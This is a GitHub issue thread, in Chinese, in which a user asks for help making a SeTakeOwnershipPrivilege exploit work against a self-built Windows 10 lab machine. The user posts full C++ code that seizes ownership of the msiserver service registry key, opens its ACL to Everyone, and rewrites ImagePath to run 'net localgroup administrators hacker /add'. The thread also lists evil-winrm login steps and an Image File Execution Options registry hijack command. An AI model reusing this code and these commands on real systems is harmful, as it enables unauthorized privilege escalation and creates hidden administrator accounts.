Homework-of-C-Language icon indicating copy to clipboard operation
Homework-of-C-Language copied to clipboard

Published 20 hours ago verified publisher icon 3gstudent

SeTakeOwnershipPrivilege的利用

Open zusda opened this issue 2 years ago • 4 comments

SeTakeOwnershipPrivilege的利用能写出来看下吗,我利用了restore代码在自己搭建的靶机中利用,总是报错拒绝访问。

// takeOwnerShip2.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <Windows.h>
#include <winternl.h>
#include <Windows.h>
#include <sddl.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <string>
#include <tchar.h>
#include <AclAPI.h>
#include<iostream>

PVOID
GetInfoFromToken(HANDLE current_token, TOKEN_INFORMATION_CLASS tic)
{
	DWORD n;
	PVOID data;

	if (!GetTokenInformation(current_token, tic, 0, 0, &n) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
		return 0;

	data = (PVOID)malloc(n);

	if (GetTokenInformation(current_token, tic, data, n, &n))
		return data;
	else
		free(data);

	return 0;
}

int main()
{
	wchar_t infile[] = L"MACHINE\\SYSTEM\\CurrentControlSet\\Services\\msiserver";
	HANDLE current_token;
	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &current_token);
	PTOKEN_USER user = (PTOKEN_USER)GetInfoFromToken(current_token, TokenUser);
	PSID UserSid = (LPTSTR)user->User.Sid;
	DWORD dwRes = SetNamedSecurityInfoW(infile, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, UserSid, NULL, NULL, NULL);

	PSID pSIDEveryone = NULL;
	PACL pACL;
	SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
	AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pSIDEveryone);
	EXPLICIT_ACCESS ea[1];
	ea[0].grfAccessPermissions = KEY_ALL_ACCESS;
	ea[0].grfAccessMode = SET_ACCESS;
	ea[0].grfInheritance = NO_INHERITANCE;
	ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
	ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
	ea[0].Trustee.ptstrName = (LPTSTR)pSIDEveryone;
	SetEntriesInAcl(1, ea, NULL, &pACL);


	//wchar_t infile[] = L"SYSTEM\\CurrentControlSet\\Services\\msiserver";
	dwRes = SetNamedSecurityInfoW(infile, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL);
	if (dwRes != ERROR_SUCCESS)
		printf("[-] Failed to set owner: %d\n", dwRes);
	else
		printf("[!] Success!\n");


	HKEY hKey;
	LONG lResult;
	lResult = RegCreateKeyExA(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\msiserver",
		0,
		NULL,
		REG_OPTION_BACKUP_RESTORE,
		KEY_SET_VALUE,
		NULL,
		&hKey,
		NULL);
	std::cout << "RegCreateKeyExA result: " << lResult << std::endl;
	if (lResult != 0) {
		exit(0);
	}

	//HKEY hk = HKEY("SYSTEM\\CurrentControlSet\\Services\\msiserver");
	std::string buffer = "cmd.exe /c net localgroup administrators hacker /add";
	LONG stat = RegSetValueExA(hKey, "ImagePath", 0,
		REG_EXPAND_SZ,
		(const BYTE*)buffer.c_str(),
		buffer.length() + 1);
	std::cout << "RegSetValueExA result: " << stat << std::endl;
	if (stat != 0) {
		exit(0);
	}
}

zusda avatar May 09 '22 09:05 zusda

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp

你的环境下,这个可以用吗

3gstudent avatar May 16 '22 01:05 3gstudent

能用,但作用仅仅是获取了注册表某条目的权限,我后面添加了serestore的利用代码(你发的代码中的// exploit it via restore注释部分),但是报错,说没有权限访问,但我手动操作确实是获得权限了的。

后来我自己利用部分这,用了windows自带的reg.exe。成功修改注册表的条目内容了。

我是win10环境 配置命令:

powershell -ep bypass

Import-Module carbon

Grant-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege

Test-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege

然后用winrm登录

evil-winrm -i 10.254.1.102 -u aarti -p "123"

------------------ 原始邮件 ------------------ 发件人: "3gstudent/Homework-of-C-Language" @.>; 发送时间: 2022年5月16日(星期一) 上午9:09 @.>; @.@.>; 主题: Re: [3gstudent/Homework-of-C-Language] SeTakeOwnershipPrivilege的利用 (Issue #8)

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp

你的环境下,这个可以用吗

— Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: @.***>

zusda avatar May 16 '22 09:05 zusda

我可以这么理解吗:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp 这个代码可以生效,然后能够以低权限执行reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v takeownership /t REG_SZ /d "C:\\Windows\\System32\\calc.exe"

你想在.cpp中实现reg add的操作,但是失败了?

3gstudent avatar May 17 '22 07:05 3gstudent

是的

---原始邮件--- 发件人: @.> 发送时间: 2022年5月17日(周二) 下午3:05 收件人: @.>; 抄送: @.@.>; 主题: Re: [3gstudent/Homework-of-C-Language] SeTakeOwnershipPrivilege的利用 (Issue #8)

我可以这么理解吗:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp 这个代码可以生效,然后能够以低权限执行reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v takeownership /t REG_SZ /d "C:\Windows\System32\calc.exe"

你想在.cpp中实现reg add的操作,但是失败了?

— Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: @.***>

zusda avatar Oct 11 '22 07:10 zusda